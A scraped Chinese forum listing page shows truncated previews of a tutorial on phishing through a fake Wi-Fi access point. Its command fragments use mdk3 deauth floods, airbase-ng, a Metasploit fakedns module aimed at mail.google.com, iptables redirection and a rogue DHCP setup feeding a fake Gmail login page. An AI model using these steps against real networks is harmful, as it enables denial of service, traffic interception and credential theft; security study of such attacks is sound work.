Image
Image

features

+ 关注

粉丝 1     |     主题 41     |     回帖 463

无线安全: 通过伪AP进行DHCP+DNS劫持的钓鱼攻击
2019-9-7 17:42
  • SimpleLink 论坛
  • 33
  • 4109
  使用MDK将客户端强制踢下线,迫使其连接到我们的伪AP上 mdk3 mon0 d -s 120 -c 1,6,11 ...  
  启动DNS msfconsole use auxiliary/server/fakedns show options set TARGETACTION FAKE set TARGETDOMAIN ...  
  Iptables流量牵引 echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A POSTROUTING -s 10.0.0.0/ ...  
  启动DHCP ifconfig at0 up ifconfig at0 10.0.0.1 netmask 255.255.255.0 ifconfig at0 mtu 1500 route ad ...  
  启动伪AP airbase-ng mon0 -e "AirJ" -c 1  
  我们了解到以下信息 1. SSID(WiFi名称): AirJ 2. 加密方式: OPEN 3. 信道: 1  
  探测目标客户端所连接的AP,为伪AP的架设作准备 airodump-ng mon0  
  3. 攻击重现实验 至此,我们已经解决了这个攻击姿势中所涉及到的所有技术难点,我们来从头梳理、重现一遍 ...  
  这里我们使用无线DOS工具MDK3,它能够发起如下攻击: 1. Beacon Flood Mode 我们知道,Beacon(管理帧)是AP ...  
  0x5: Deauth/DOS拒绝服务攻击 至此,我们已经理清了一个伪AP钓鱼劫持的攻击过程中涉及到的技术,但是,还 ...  
  为了说明原理,我们的钓鱼页面可以这样简单的code一下 可以看到,劫持前,用户正在正常的访问GMAIL邮箱 ...  
  0x5: XSS中的同源策略 我们已经将用户访问mail.google.com的流量劫持到了我们的钓鱼页面 客户端连接上我 ...  
  要注意的是: 1. fakedns这个msf模块只会劫持我们设置的域名,在本例中是mail.google.com 2. 对于其他的非 ...  
  配置方法如下: use auxiliary/server/fakedns show options set TARGETACTION FAKE set TARGETDOMAIN mail ...  
  0x4: DNS配置 我们在DHCP服务器的配置文件中指定客户端的默认DNS为伪AP所在的本机(10.0.0.1) 所以,我 ...  
  0x3: Iptables流量牵引 我们目前通过伪AP、以及伪DHCP的架设,将目标客户端的流量都劫持到了我们的无线虚 ...  
  #启动DHCP服务 这里要重点关注的是网关(option routers 10.0.0.1)的设置,我们的伪AP的IP地址也要设置成同 ...  
  #启动伪AP,激活at0网口 在启动DHCP之前,要先启动伪AP,激活at0网口 ifconfig wlan1 up airmon-ng start ...  
  #安装DHCP服务 apt-get -y install dhcp3-server 安装过程中遇到错误: Errors were encountered while pr ...  
  我们手工搭建一个DHCP服务器 #将网卡设置为静态IP vim /etc/network/interfaces auto eth0 #iface eth0 i ...  
2
3
近期访客